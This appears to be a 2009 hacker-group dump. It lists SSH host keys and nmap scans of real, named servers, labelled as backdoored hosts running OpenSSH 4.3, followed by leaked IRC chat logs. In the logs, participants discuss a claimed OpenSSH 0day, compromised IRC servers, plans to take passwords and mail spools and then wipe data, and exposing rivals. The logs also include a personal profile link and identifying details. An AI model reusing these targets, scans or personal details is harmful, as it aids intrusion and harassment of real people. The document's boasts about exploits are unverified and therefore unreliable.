98.192.246.70 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5iUbneFne+6pmfWqlHfXk19SpS8GAM6peFONJOQXMOhTYKnQvZg+3H4eP0aa3gr0ejDbr/UCyZugRez31OolzZsICM99dSE1yIdD57XFczY0QxffOz5C40dQvlfvNmQXRSptqYygHLJIvm1p6qpyZrnrhRwV5OiNogYLLMQqKRFxOlJWUEa/78mgfQ/LI3Edu1JX79cfhmYKak+WAs+ph3yn70HiFemksr3xJ7G2GQxGsg7jkbAnsrcsSO3KkI99uy9HN+dB2+sEu18kVzEYdKz0T1pjNZ3B5o2B55GhEsoHvrqpBNRmXT7jJcD4v0m0NqYfbFwmj4/x1ykfbmVf7w==
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
makosolutions.com,67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
quad1.ircvps.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==

// Backdoored Servers (Makosolutions, Efnet, IRCVPS, etc..) all running OpenSSH <= 4.3

NMap Scans of all servers compromised
-------------------------------------

1. nmap -v -sV -P0 webhostline.com -p 2222

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.09s elapsed
Initiating SYN Stealth Scan at 11:28
Scanning 6696220213.hostnoc.net (66.96.220.213) [1 port]
Discovered open port 2222/tcp on 66.96.220.213
Completed SYN Stealth Scan at 11:28, 0.77s elapsed (1 total ports)
Initiating Service scan at 11:28
Scanning 1 service on 6696220213.hostnoc.net (66.96.220.213)
Completed Service scan at 11:28, 0.57s elapsed (1 service on 1 host)
NSE: Script scanning 66.96.220.213.
NSE: Script Scanning completed.
Host 6696220213.hostnoc.net (66.96.220.213) is up (0.24s latency).
Interesting ports on 6696220213.hostnoc.net (66.96.220.213):
PORT     STATE SERVICE VERSION
2222/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
           Raw packets sent: 1 (44B) | Rcvd: 48 (4086B)


2. nmap -v -sV -P0 -p 22 vitalspeeds.com

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.02s elapsed
Initiating SYN Stealth Scan at 11:28
Scanning ukscene.diyhost.co.uk (66.197.170.181) [1 port]
Discovered open port 22/tcp on 66.197.170.181
Completed SYN Stealth Scan at 11:28, 0.82s elapsed (1 total ports)
Initiating Service scan at 11:28
Scanning 1 service on ukscene.diyhost.co.uk (66.197.170.181)
Completed Service scan at 11:28, 0.52s elapsed (1 service on 1 host)
NSE: Script scanning 66.197.170.181.
NSE: Script Scanning completed.
Host ukscene.diyhost.co.uk (66.197.170.181) is up (0.25s latency).
Interesting ports on ukscene.diyhost.co.uk (66.197.170.181):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)

3. nmap -v -sV -P0 -p 22 stardustdawn.com

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.69s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning mx101.stardustdawn.com (64.191.69.101) [1 port]
Discovered open port 22/tcp on 64.191.69.101
Completed SYN Stealth Scan at 11:29, 0.80s elapsed (1 total ports)
Initiating Service scan at 11:29
Scanning 1 service on mx101.stardustdawn.com (64.191.69.101)
Completed Service scan at 11:29, 0.60s elapsed (1 service on 1 host)
NSE: Script scanning 64.191.69.101.
NSE: Script Scanning completed.
Host mx101.stardustdawn.com (64.191.69.101) is up (0.24s latency).
Interesting ports on mx101.stardustdawn.com (64.191.69.101):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)


4. nmap -v -sV -P0 -p 2022 irc.indoirc.net

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Warning: Hostname irc.indoirc.net resolves to 2 IPs. Using 70.34.192.50.
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning ip-70-34-192-50.razorservers.com (70.34.192.50) [1 port]
Discovered open port 2022/tcp on 70.34.192.50
Completed SYN Stealth Scan at 11:29, 0.82s elapsed (1 total ports)
Initiating Service scan at 11:29
Scanning 1 service on ip-70-34-192-50.razorservers.com (70.34.192.50)
Completed Service scan at 11:29, 0.55s elapsed (1 service on 1 host)
NSE: Script scanning 70.34.192.50.
NSE: Script Scanning completed.
Host ip-70-34-192-50.razorservers.com (70.34.192.50) is up (0.26s latency).
Interesting ports on ip-70-34-192-50.razorservers.com (70.34.192.50):
PORT     STATE SERVICE VERSION
2022/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)

5. nmap -v -sV -P0 -p 22 absolute.ownage.net

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 12:23 GTB Daylight Tim
e
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 12:23
Completed Parallel DNS resolution of 1 host. at 12:23, 0.51s elapsed
Initiating SYN Stealth Scan at 12:23
Scanning absolute.ownage.net (72.20.28.205) [1 port]
Discovered open port 22/tcp on 72.20.28.205
Completed SYN Stealth Scan at 12:23, 0.88s elapsed (1 total ports)
Initiating Service scan at 12:23
Scanning 1 service on absolute.ownage.net (72.20.28.205)
Completed Service scan at 12:23, 0.64s elapsed (1 service on 1 host)
NSE: Script scanning 72.20.28.205.
NSE: Script Scanning completed.
Host absolute.ownage.net (72.20.28.205) is up (0.31s latency).
Interesting ports on absolute.ownage.net (72.20.28.205):
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 1.99)

Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
// OpenSSH upgraded to 5.2 

6. nmap -sV -p 22 ircvps.com

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-19 13:37 GTB Standard Time
Interesting ports on s69-163-34-138.in-addr.arpa.static.dsn1.net (69.163.34.138)
:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)

Service detection performed. Please report any incorrect results at http://nmap.
org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds


7. anti-sec:~/pwn# ./map ssanz.net

IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3

IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3


8. Astalavista

[7/4/2009 3:39:52 PM] Glafkos Charalambous: the exploit is openssh v4.3 and below
[7/4/2009 3:40:17 PM] Glafkos Charalambous: what OS was asta running ?
[7/4/2009 3:40:28 PM] Pascal Mittner: CentOS
[7/4/2009 3:40:53 PM] Glafkos Charalambous: centos 5.3 latest version comes with openssh 4.3p2



ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
ANTISECFORLULZ				  ANTISECFORLULZ
ANTISECFORLULZ 	    Private Chat Logs     ANTISECFORLULZ
ANTISECFORLULZ				  ANTISECFORLULZ
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ


--- Log opened Wed Jun 17 09:05:41 2009
09:05 [Glyph(Glyph@mods.govsec.org)] might want to be more selective.. your 0day is starting to become apparent with each g0troot
09:06 -pand!- Irssi: Starting query in bhf with Glyph
09:07 (RoMeO) wat
09:07 (Glyph) Need to be more 'selective' 
09:07 (Glyph) two of two ... tsk, tsk, tsk..
09:07 (RoMeO) you need to explain more, and why do you think i wrote 'g0troot' or ever used it 
09:07 (Glyph) If you keep up with that, everyone is gonna now where to look.
09:08 (RoMeO) and where did you see me use it? lol 
// Everywhere..

09:08 (Glyph) Doesn't what distro, when there's another 'common element' 
// OpenSSH <= 4.3

09:08 (Glyph) Just saying need to be more circumspect.
09:08 (Glyph) Not saying 'you'..
09:09 (RoMeO) okay :]
09:09 (Glyph) But I know you'll get w1rd to those responsible.
09:09 (Glyph) Capice?
09:09 (RoMeO) will do
09:09 (Glyph) If the 'perps' keep it up, it won't be a 0day now will it?
09:10 (RoMeO) ofcourse, but again... i am pretty sure you dont know where to look and if you look hard you will see 'g0troot' only used once in public
09:10 (RoMeO) so i dont know what do you mean by 'need to stop using it' sicne it was only used once from what i read
09:11 (Glyph) Rightio.
09:11 (Glyph) two out of two 
09:11 (Glyph) Both had a common element.
09:11 (RoMeO) which is
09:11 (Glyph) Besides being shitty about 'security'
09:11 (Glyph) For pay type product.
09:12 (RoMeO) yeah
09:12 (RoMeO) the targetted people are publicized
09:12 (RoMeO) they are the people that say they are security experts while they dont really qualify to be your average noob
09:12 (RoMeO) the people who publish exploits
09:13 (RoMeO) people who make money out of free stuff, related to 'security' etc
09:13 (Glyph) lol.. not yesterday's demo ;)
09:13 (RoMeO) yesterday was just to prove something to dark
09:13 (RoMeO) he didnt say a word after that
09:13 (Glyph) Aye.. but .....
09:13 (Glyph) tipped the scales in my favour.
09:14 (Glyph) The more it gets done, the more likely it is the 0day is exposed.
09:14 (RoMeO) ofcourse
09:14 (Glyph) Now.. that does NOT mean that all that have the product haven't alreay been 'had'
09:14 (Glyph) But it does lead to disclosure.
09:15 (Glyph) 'Even a blind pig finds an acorn every now and then'
09:15 (RoMeO) sure, i understand
09:15 (Glyph) And InfoSec isn't st00pid like Dark seems to think. 
// Really ?

09:15 (RoMeO) i never underestimate anyone
09:15 (RoMeO) thats my rule 

09:16 (Glyph) If I can already see 'glimpses', you can bet others out there can as well.
09:17 (RoMeO) let them see it, antisec got more tricks up the sleeves ;p
09:17  -> Glyph chuckles
09:17 (Glyph) I'm well aware of that.
09:17 (Glyph) But don't ya just hate losing 'weaponized' shit for a lark?
09:18 (Glyph) Put that arrow back in yer quiver.. might be really useful sometime down the road.
09:18 (RoMeO) yeah, i understand you, and again it was just to prove something to someone... nothing was left behind, those 'acts' rarely ever happen
09:19 (Glyph) Thing is.. WTF did you need to prove any damn thing to Dark?
09:19 (Glyph) Scratch that.. change pronouns to third person ;)
09:19 (RoMeO) its between me and him ;p
09:19 (RoMeO) he talks alot
09:21 (Glyph) You know I log the publics?
09:21 (RoMeO) i assume alot do

09:22 (RoMeO) i just hope you dont log privates

09:37 (RoMeO) so your job is basically... ?
09:40 (Glyph) Coordinator, IT Research and Special Projects.. in a 2 year college
09:40 (RoMeO) nice, well i will bbl
09:41 (Glyph) Ciao.. and yes that's enough info to figure out who I am.
09:41 (RoMeO) haha
--- Log closed Wed Jun 17 09:46:34 2009

--- Log opened Wed Jun 17 14:21:36 2009
14:21 (Glyph) Aye.
14:22 (Glyph) Don't take the stuff I spin in channel to heart.
14:22 (RoMeO) :)
14:22 (Glyph) I'm interested in debating with Dark.
14:22 (RoMeO) yeah i saw
14:22 (Glyph) Plus it may actually spark some interest in the subject.
14:22 (RoMeO) but again, all he does is talk
14:22 (RoMeO) so what i did when i first met him was
14:22 (RoMeO) to shut him up
14:23 (RoMeO) i put him up on a challenge
14:23 (Glyph) It's a topic that every individual needs to make a decision about.
14:23 (RoMeO) we made some random guy on irc to post a random security site
14:23 (RoMeO) and the challenge was who gets access to it first
14:23 (RoMeO) i got in
14:23 (RoMeO) he didnt
14:23 (RoMeO) but he kept on arguing
14:23 (RoMeO) about how he got vulns on it, but its 'way over my league' rofl
14:24 (Glyph) You know what that sounds like to me?
14:24 (RoMeO) what
14:24 (Glyph) 'tempest in a teacup'
14:24 (RoMeO) lol
14:24 (Glyph) Notice he braced me in channel..
14:24 (Glyph) right.
14:24 (RoMeO) right
14:24 (Glyph) 'When did you stop beating your wife sir?'
14:25 (RoMeO) lol.
14:25 (Glyph) HE should be presuming that everyone has 'skillz' and can whoop his arse.
14:25 (RoMeO) he is all about talk, and its not like he just started this, no no, apparently he been around since 2000 and doing the -same- ever since
14:26 (Glyph) hmmm... I've been around a lot longer than that.
14:26 (RoMeO) yea, just saying its not like he does that here only or just now
14:26 (Glyph) Course I can plead ignorance.. not aware of a lot
14:26 (Glyph) Leopard isn't likely to change its spots
14:27 (RoMeO) haha
14:28 (RoMeO) webdevil knows alot about him too, he was there when he got kicked in his lil challenge
14:28 (RoMeO) and he didnt come back to the channel for a long long time after that
14:29 (Glyph) I presume you have an account at gso
14:29 (RoMeO) i dont know honestly
14:29 (RoMeO) but if ther was, it would be RoMeO
--- Log closed Wed Jun 17 14:34:34 2009


--- Log opened Thu Jun 18 17:35:20 2009
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Wheres newtype hang these days?
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Its been so long since I've talked with her
17:35 -pand!- Irssi: Starting query in bhf with Dark
17:36 (RoMeO) we just met on rizon
17:36 (RoMeO) for a small chat
17:36 (Dark) Word
17:36 (Dark) Can I safely assume she's all up in -antisec?
17:36 (Dark) In lieu of recent Astalavista incident?
17:38 (Dark) Well
17:38 (Dark) If you see her around again
17:38 (Dark) Tell her Dark says hi
17:38 (Dark) And thanks for everything
17:38 (RoMeO) what do yoou mean -antisec
17:38 (RoMeO) and willl do
17:39 (Dark) I mean
17:39 (Dark) She's probably restarting her actions
17:39 (Dark) In zfo and whatnot
17:39 (Dark) Just an assumption
17:39 (RoMeO) i dont know really, but she really liked the latest antisec movement
17:39 (RoMeO) actions etc
17:39 (Dark) Good to hear
17:39 (RoMeO) ^^
17:40 (Dark) Along time ago she said she had a ICMP exploit for IOS
17:40 (Dark) I may attempt to locate her and coax it out of her
17:40 (Dark) Seeing as she's probably not using it anymore
17:40 (RoMeO) yea, she is out of all this for now
17:40 (RoMeO) too busy and whatnot
17:40 (Dark) Haha
17:41 (Dark) She's majoring in CompSci yea?
17:41 (RoMeO) yes ;\
17:41 (Dark) Eh
17:41 (RoMeO) i hate CS
17:41 (Dark) Shoulda known
17:41 (Dark) Same
17:41 (RoMeO) too broad
17:41 (Dark) Fucking Linguistics + Econ for great justice
17:41 (RoMeO) java is gay
17:42 (Dark) To be honest, I haven't seen alot of the oldschool people for a really long time
17:42 (RoMeO) yeah
17:42 (Dark) Theres a few left here and there
17:42 (RoMeO) everyone gets busy for some time
17:42 (Dark) I wish they'd pop up
17:42 (RoMeO) but they all come back eventually
17:42 (Dark) I guess making a new antisec is where its gotta be
17:42 (RoMeO) i hope anyways
17:43 (Dark) I think defcon should go over well
17:43 (RoMeO) yes, new movement and just wait for people to join from diff communities
17:43 (Dark) After that
17:43 (Dark) As I see it
17:43 (Dark) Its all out war
17:43 (RoMeO) rawr
17:43 (Dark) So start saving your exploits nao
17:43 (RoMeO) hidden in sekret boxen ;O
17:44 (Dark) For sure
17:44 (RoMeO) lcirc is being monitored now
17:44 (RoMeO) they host  #milw0rm and #bottalk
17:44 (Dark) Probably
17:45 (RoMeO) no like. i know for sure
17:45 (Dark) Monitored by pr0jekt types, or by the feds?
17:45 (RoMeO) pr0ject types
17:45 (Dark) I figured as much
17:45 (RoMeO) and feds ofcourse, but pr0ject types got the root shell
17:46 (Dark) You know what the intentions are?
17:46 (RoMeO) take down after exposure
17:46 (RoMeO) intel, private messages, passwords, mail spools, then rm -rf
17:46 (Dark) can't say I've ever really been to lcirc
17:46 (RoMeO) should get them all to stop
17:47 (Dark) Owning milw0rm is a reasonable priority
17:47 (Dark) As well as Secfocus of course
17:47 (RoMeO) it is in the right hands
17:47 (RoMeO) :]
17:47 (Dark) I've been trying to go rogue on some stuff
17:47 (Dark) I'm not part of any group per se now that
17:48 (RoMeO) neither ami
17:48 (RoMeO) doing it on my own
17:48 (RoMeO) i function better solo
--- Log closed Thu Jun 18 18:07:45 2009

--- Log opened Fri Jun 19 09:07:17 2009
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] back
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] are you excited about leaving?
09:09 -pand!- Irssi: Starting query in secchat with BSDGurl
09:09 (RoMeO) well yea ;D
09:10 (BSDGurl) i was reading the logs this morning and like
09:11 (BSDGurl) i have to tell romeo good luck and to be safe etc before he leaves
09:11 (BSDGurl) i know you will have Internet but still
09:11 (RoMeO) :)
09:11 (RoMeO) thxthx
09:11 (BSDGurl) it's kind of scary
09:12 (BSDGurl) i was scared to start uni here
09:12 (RoMeO) thats why i moved bounces this week, i will be idle here 24/7 and read logs / messsages at night / whenver i can get online
09:12 (BSDGurl) hahahaha
09:12 (RoMeO) lawl, i am excitted
09:12 (BSDGurl) yes it was like a mix
09:13 (RoMeO) yea it is a mix of being scared and excitted, but all good
09:13 (BSDGurl) i hope you learn and are not bored
09:13 (BSDGurl) do you have maths and things?
09:13 (RoMeO) no thanks god
09:13 (BSDGurl) yes
09:14 (RoMeO) maths might be involved in a few chapters of the software engineeering, but all good
09:14 (RoMeO) not like computer science for example, which is all around maths and java -_-
09:14 (BSDGurl) hahahaa java
09:14 (RoMeO) yea...
09:14 (BSDGurl) you know i don't hate java
09:14 (BSDGurl) it's just all those guys
09:14 (RoMeO) i hate it cause of what i hear from those people
09:14 (BSDGurl) they ride the nuts
09:14 (BSDGurl) so hard
09:14 (RoMeO) lmao
09:14 (BSDGurl) it's like
09:14 (BSDGurl) funny
09:15 (BSDGurl) i can't help it
09:15 (RoMeO) this friend of mine in uni now
09:15 (RoMeO) his CS teacher walks in the room daily
09:15 (RoMeO) and screams
09:15 (RoMeO) JAVA IS THE FUTURE
09:15 (RoMeO) :|
09:15 (BSDGurl) rofl
09:15 (RoMeO) true story
09:15 (BSDGurl) they all do
09:15 (BSDGurl) hahahaha
09:15 (RoMeO) thats scary lol
09:15 (BSDGurl) i know
09:15 (RoMeO) how could java be possibly the future
09:16 (RoMeO) possibly be*
09:16 (BSDGurl) that's why i can't help but just say things to piss them off
09:16 (BSDGurl) i don't even care
09:16 (RoMeO) every lang got its use, kthxbai
09:16 (BSDGurl) i am like no
09:16 (BSDGurl) i don't even know java
09:16 (RoMeO) me too lmao
09:16 (BSDGurl) it maybe the future for all i know
09:16 (BSDGurl) hahaha
09:16 (RoMeO) future of wat xD
09:16 (BSDGurl) i just imagine them all pissed off
09:16 (RoMeO) lmao
09:16 (RoMeO) 'oh shit'
09:17 (BSDGurl) i went to rootsecurity the other night to see what was going on
09:18 (RoMeO) gay
09:18 (BSDGurl) cos this place is so dea
09:18 (BSDGurl) d
09:18 (BSDGurl) of course it was like
09:18 (BSDGurl) you are some pic
09:18 (BSDGurl) or this or that
09:18 (RoMeO) lol wow
09:18 (BSDGurl) i swear i can't go anywhere
09:18 (RoMeO) ;(
09:18 (RoMeO) - /nick BSDBoi
09:18 (BSDGurl) haha
09:18 (RoMeO) lolol
09:19 (BSDGurl) i don't understand i
09:19 (BSDGurl) t
09:19 (RoMeO) its internet
09:19 (BSDGurl) you know the big deal
09:19 (BSDGurl) oh and the guy
09:19 (BSDGurl) the one you banned that asked me if i was nell
09:19 (RoMeO) lol yea
09:19 (BSDGurl) he joined bhf and said
09:19 (BSDGurl) this chan is for fags
09:20 (BSDGurl) then left
09:20 (BSDGurl) rofl
09:20 (RoMeO) ;O
09:20 (RoMeO) he gots issues
09:20 (BSDGurl) so you know i am expecting people to say
09:20 (BSDGurl) bsdgurl this is you
09:20 (BSDGurl) and show me someone named nell now
09:20 (BSDGurl) hahaha
09:20 (RoMeO) xD
09:20 (RoMeO) 'i had you on myspace'
09:20 (RoMeO) wat
09:20 (RoMeO) .
09:21 (BSDGurl) i know
09:21 (BSDGurl) god  being on that site
09:21 (BSDGurl) i was years ago
09:21 (RoMeO) facebook is nice ;p 

// http://www.facebook.com/profile.php?id=1119054258 :)

09:21 (BSDGurl) like i haven't been for at least 2
09:21 (BSDGurl) no lie
09:21 (BSDGurl) i wouldn't lie i still have all the flash profiles i made etc
09:22 (RoMeO) haha
09:22 (BSDGurl) you know because you could custom it
09:22 (RoMeO) yeah
09:22 (RoMeO) not a myspace fan
09:22 (RoMeO) tho
09:22 (BSDGurl) me either now
09:22 (RoMeO) facebook is simple and good
09:22 (BSDGurl) i have an account
09:22 (BSDGurl) it's fake
09:23 (RoMeO) lol i hae a fake account with my public email there
09:23 (BSDGurl) last log in was december i think
09:23 (RoMeO) and i lol when people join dmz to tell me
09:23 (RoMeO) 'hello john genter'
09:23 (RoMeO) cause the name there is john genter
09:23 (RoMeO) lmfao
09:23 (BSDGurl) rofl
09:23 (BSDGurl) i hate that myspace shit though
09:23 (BSDGurl) seriously
09:24 (RoMeO) yeah
09:24 (BSDGurl) so yeah i am nell
09:24 (BSDGurl) haha
09:24 (RoMeO) hai nell
09:24 (RoMeO) xD
09:24 (RoMeO) http://www.nellmcandrew.tv/
09:24 (BSDGurl) i am curious to see if meathive stays
09:24 (RoMeO) i lol'd
09:25 (BSDGurl) last night he was really pissed at asta
09:25 (RoMeO) yea i saw
09:25 (BSDGurl) i told him you know the servers aren't related
09:25 (BSDGurl) but i don't think he believed me
09:25 (RoMeO) what servers 
09:26 (RoMeO) irc and web?
09:26 (BSDGurl) they irc
09:26 (BSDGurl) the
09:26 (RoMeO) yeah
09:26 (RoMeO) its ok lol
09:26 (BSDGurl) i didn't want to like go into with him
09:27 (BSDGurl) i was just like do what you think is best:/
09:27 (BSDGurl) i didn't know what to say
09:27 (RoMeO) haha, what is he doing anyways
09:27 (RoMeO) i just saw a rant
09:27 (BSDGurl) i know
09:27 (BSDGurl) i don't know what
09:28 (RoMeO) i think people should move on already
09:28 (BSDGurl) Me TOO
09:28 (RoMeO) lol!
09:28 (BSDGurl) thank you
09:28 (RoMeO) sites get hacked all the time
09:28 (BSDGurl) you know what i said
09:28 (BSDGurl) think about this
09:28 (BSDGurl) you know if you staged
09:28 (BSDGurl) that
09:29 (BSDGurl) and threw those ads
09:29 (BSDGurl) back up
09:29 (RoMeO) stunt
09:29 (BSDGurl) you would make bank 
09:29 (RoMeO) yes.
09:29 (BSDGurl) :)
09:29 (RoMeO) everyone checks asta now to see whats new in the 'hack'
09:29 (RoMeO) lolol
09:29 (BSDGurl) yes
09:29 (BSDGurl) think about that
09:29 (RoMeO) it got more backlinmks than google over night
09:29 (BSDGurl) membership down
09:30 (BSDGurl) etc
09:30 (BSDGurl) now look
09:30 (BSDGurl) cash in
09:30 (BSDGurl) think about it for darkmindz too
09:30 (BSDGurl) hahaha
09:30 (RoMeO) lmfao
09:30 (RoMeO) 'HACKED AND EXPOSED'
09:30 (BSDGurl) pwn xlink
09:31  -> BSDGurl dies
09:31 (RoMeO) and put all kinda ads on there, and blame the hacker
09:31 (BSDGurl) yes
09:31 (RoMeO) fun
09:31 (RoMeO) if i ever need money in uni, thats plan A
09:31 (BSDGurl) biber can be fall guy
09:31 (BSDGurl) hahaha
09:31 (RoMeO) ^^
09:32 (BSDGurl) let me go back to art shit
09:32 (RoMeO) oh enjoy
09:32 (BSDGurl) i just wanted to tell you have a safe trip
09:33 (RoMeO) thank you <3
09:33 (BSDGurl) if i didnt get to talk
09:33 (RoMeO) ^_^
09:33 (BSDGurl) <3 you are very welcome
--- Log closed Fri Jun 19 09:34:04 2009

--- Log opened Sun Jun 21 09:24:55 2009
09:24 [{Glyph_Home}(~glyph@mods.govsec.org)] btw, unless it's been you whacking GSO, the technique is becoming widespread.
09:25 -INFO- Irssi: Starting query in bhf with {Glyph_Home}
09:25 (RoMeO) mm?
09:28 (RoMeO) what are you talking about lol
09:29 ({Glyph_Home}) GSO has had issues this past week.
09:29 ({Glyph_Home}) I thought perhaps you were the reason.
09:29 (RoMeO) because  rsnake released a DoS tool
09:29 (RoMeO) nope
09:29 ({Glyph_Home}) No.. the litespeed issue
09:29 (RoMeO) my issues dont go on lagging web servers
09:30 ({Glyph_Home}) Though I have no idea why you'd nail GSO
09:30 ({Glyph_Home}) Doesn't seem to be your 'venue'
09:30 (RoMeO) that too
09:31 ({Glyph_Home}) I've already talked with Edu and WebDevil..
09:31 (RoMeO) about
09:31 ({Glyph_Home}) Gonna make my  'recommends' to the admins this week.
09:31 (RoMeO) i find it funny how staff at 'black hat forums'  get to be staff at ' gov sec' 
09:32 ({Glyph_Home}) Quesion: Any tips on 'mitigating' the /g0troot issue?
09:32  -> {Glyph_Home} chuckles
09:32 ({Glyph_Home}) Not exactly a 'whitehat' myself.
09:32 (RoMeO) lolol
09:32 ({Glyph_Home}) I just don't 'participate' in the darkside anymore.
09:33 (RoMeO) just keep the site clean, didnt see gso being mentioned anywhere as a target, ever
09:33 (RoMeO) so all good
09:33 ({Glyph_Home}) Used to..

09:33 (RoMeO) but people who are going down soon are botnet communities for example 
09:34 ({Glyph_Home}) hmmm... Sounds like a shadowserver operation.
09:34 (RoMeO) just cleaning the net
09:34 ({Glyph_Home}) Straight out of the 'toyshop'
09:34 (RoMeO) :]
09:35 ({Glyph_Home}) Antisec is beginning to sound more like 'cybercops' 
09:36 (RoMeO) haha

09:36 (RoMeO) wont be done under antisec 
09:36 (RoMeO) antisec is kept for 'security' issues 
09:36 (RoMeO) this is, botnet and skids crap

09:36 ({Glyph_Home}) hmmm... 
09:37 ({Glyph_Home}) IFF I can be of assistance, without endangering current position, I offer my not so hot skill sets.
09:37 (RoMeO) all good so far
09:37 (RoMeO) lcirc and indoirc got comprimised
09:37 (RoMeO) the 2 largest botnet and ccpower ircd's
09:38 ({Glyph_Home}) w00f
09:38 (RoMeO) ;)
09:38 ({Glyph_Home}) Might be an idea for the info to make it back to the ccproviders.. discretely and anonymously of course.
09:38 (RoMeO) well
09:38 (RoMeO) the idea is
09:39 (RoMeO) to release all intel and ip's on the people who started those channels / irc's
09:39 (RoMeO) out in the public and all over the net
09:39 (RoMeO) let the authorities deal with that
09:39 ({Glyph_Home}) roflmao
09:39 (RoMeO) :]
09:39 (RoMeO) brb
--- Log closed Sun Jun 21 09:44:31 2009


--- Log opened Mon Jun 22 16:15:04 2009
